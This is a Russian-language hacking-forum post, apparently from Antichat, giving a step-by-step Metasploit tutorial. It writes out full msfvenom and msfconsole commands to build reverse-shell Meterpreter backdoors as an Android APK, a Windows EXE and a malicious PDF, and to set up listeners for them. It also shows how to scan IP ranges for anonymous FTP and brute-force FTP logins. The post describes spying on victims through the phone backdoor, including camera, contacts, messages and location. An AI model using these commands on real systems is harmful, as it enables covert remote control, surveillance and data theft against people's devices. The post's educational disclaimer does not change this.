HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.02.2023, 19:43
User17
Познающий
Регистрация: 08.02.2023
Сообщений: 76
С нами: 1717864

Репутация: 0
По умолчанию

Введение
Рад приветствовать дорогих читателей! Я практически уверен, что все, кто читает данную статью, как минимум слышали про такой замечательный фреймворк как Metasploit. Данный фреймворк хранит в себе довольно богатую базу данных различных уязвимостей на любой вкус и цвет, которые только возможно проэксплуатировать. В этой статье хочу познакомить вас с некоторыми полезными и даже можно выразиться базовыми уязвимостями, которые здорово помогут вам в изучении сферы информационной безопасности и естественно в саморазвитии.

Цитата:

Дисклеймер: Все данные, предоставленные в данной статье, взяты из открытых источников, не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.

Практическая часть
Итак, конечно же все действия будут проводиться на моей любимой Kali Linux, тем более там этот фреймворк уже предустановлен, поэтому если что, можно сразу к командам приступать и не париться.

Бэкдор на андроид
Здесь мы будем генерировать полезную нагрузку на андроид устройствах, делается всё довольно просто.

Мы вписываем вот такую команду для генерации:

Код:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test.apk
Что же означает данная команда? Давайте разберём!
  • Часть строки, где написано android, указывает на операционную систему, под которую генерируется полезная нагрузка;
  • meterpreter/reverse_tcp означает то, что подключаться к хосту данный бэкдор будет по протоколу tcp;
  • lhost = 192.168.0.9 означает IP хоста, к которому будет подключаться бэкдор. Так как в рамках тестирования и ознакомления всё будет проходить в локальной сети, я ввёл свой локальный IP адрес. Для того, чтобы можно было подключиться из глобальной сети к вам, соответственно, нужен будет глобальный ваш IP адрес и при реверс инжиниринге бэкдора, его будет довольно легко выявить;
  • lport = 4444 это собственно порт, по которому бэкдор будет обращаться к нам;
  • И как не сложно догадаться, в строчке R > Test.apk задаётся название нашей полезной нагрузке.
После того как она сгенерировалась, у вас в каталоге появиться ваш apk файл. Теперь я закидываю бэкдор на тестовое устройство android, но перед тем как его закинуть, нужно подготовиться к ловле сессии в нашем фреймворке. Для этого нам нужно будет его запустить вот этой командой msfconsole.

После того как мы его запустили, нам нужно выбрать нашу полезную нагрузку, а для этого вписываем последовательно следующие команды:

Код:
use exploit/multi/handler
в данной команде мы выбираем эксплоит удалённого доступа

Код:
set payload android/meterpreter/reverse_tcp
здесь мы выбираем платформу и способ подключения

Код:
set lhost 192.168.0.9
задаём наш хост

Код:
set lport 4444
задаём порт

Код:
exploit
ну и собственно запускаем



Ну теперь я устанавливаю и открываю файл полезной нагрузки, и на экране моментально получаю сессию к моему устройству. Спектр возможностей удалённого доступа здесь весьма обширный. Можно сделать фотку через любую из камер телефона, лазить по директориям и скачивать какие-либо файлы, делать полный дамп номеров в телефонной книге, сообщений и звонков, узнать местоположение и многое многое другое.
Бэкдор на Windows.
Ну здесь всё происходит впринципе аналогичным образом, нужно будет поменять лишь несколько строчек.

Код:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test2.exe
Команда так же весьма проста и понятна, поэтому переходим сразу к нашему фреймворку. Запускаем его msfconsole.

Ну и далее так же по очереди запускаем следующие команды

Код:


Код:
use exploit/mulit/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 4444

exploit


Далее аналогичным образом проверяем всё это дело на Windows по средством запуска и сессия готова.
Эксплоит в PDF
Так же для фреймворка не составит труда сгенерировать PDF файл с полезной нагрузкой и аналогичным образом подключиться к нему. Давайте же приступим!

Здесь уже msfvenom нам не понадобиться, будем всё делать прямиком в метасплоите, поэтому снова его запускаем msfconsole.

Далее прописываем вот такие команды:

Код:


Код:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs
Здесь будет задействован эксполит, который будет встроен в PDF файл

Код:


Код:
set lhost 192.168.0.9

set lport 4444

set filename Test3.pdf
Здесь задаём имя нашему файлу

Код:


Код:
exploit


Ну и далее генерируется полезная нагрузка в виде файла PDF. Подключиться можно будет так же через multi/handler. То есть просто не выходя из консоли прописываем:

Код:


Код:
use exploit/multi/handler

set lhost 192.168.0.9

set lport 4444

exploit
Ну и ждём сессии.

Вход по ftp
Так же наш фреймворк может спокойно просканировать диапазон IP адресов на возможность подключения к какому-либо с помощью ftp через логин Anonymous

Для этого мы запускаем наш фреймворк msfconsole.

И вводим следующие команды:

Код:


Код:
use auxiliary/scanner/ftp/anonymous
Выбираем наш сканер

Код:


Код:
set RHOSTS 192.168.1.200-254
Выбираем диапазон адресов для сканирования

Код:


Код:
set THREADS 55
run
Ну и собственно далее на экране у нас будут адреса на которых есть ftp и к которым можно подключиться через логин Anonymous без пароля и легко получить доступ.



Таким же образом можно и подбирать логин с паролем к диапазону адресов, для этого вводим следующие команды:

Код:


Код:
set RHOSTS 192.168.69.50-254
set THREADS 205
set USERNAME msfadmin
set PASSWORD msfadmin
set VERBOSE false
run


Ну и далее мы увидим адреса на которых есть ftp и к которым можно подключиться используя заданные вами логин и пароль для подбора.
Заключение
Сегодня поведал вам немного о такой волшебной и удивительной штуке как Metasploit Framework. И у него весьма широкий спектр применений, через него можно выполнять практически все ключевые задачи в тестировании чего-либо на уязвимость, но опять же повторюсь, что данная статья не побуждает к злонамеренным действиям и несёт лишь ознакомительный характер.
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...